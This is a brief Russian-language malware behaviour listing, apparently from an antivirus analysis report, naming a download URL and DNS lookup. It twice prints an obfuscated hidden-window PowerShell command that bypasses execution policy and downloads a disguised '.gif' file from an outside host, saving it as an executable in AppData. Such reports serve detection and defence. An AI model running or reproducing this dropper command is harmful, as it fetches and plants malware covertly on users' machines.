Техническая информация
- http://www.iemailpremium.com/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErshElL.Exe -ExecutIONPOlicY Bypass -nOProFiLe -WinDOWstyLE HiDDEn (NeW-obJect sYStEm.neT.WEBCLIeNt).DOwNLoaDfILE('http://www.iemailpremium.com/read.php?f=1.gif','%aPpData%.EXe'...
- DNS ASK ie####premium.com
- '<SYSTEM32>\cmd.exe' /C "POWErshElL.Exe -ExecutIONPOlicY Bypass -nOProFiLe -WinDOWstyLE HiDDEn (NeW-obJect sYStEm.neT.WEBCLIeNt).DOwNLoaDfILE('http://www.iemailpremium.com/read.php?f=1.gif','%aPpData%.EXe'...' (со скрытым окном)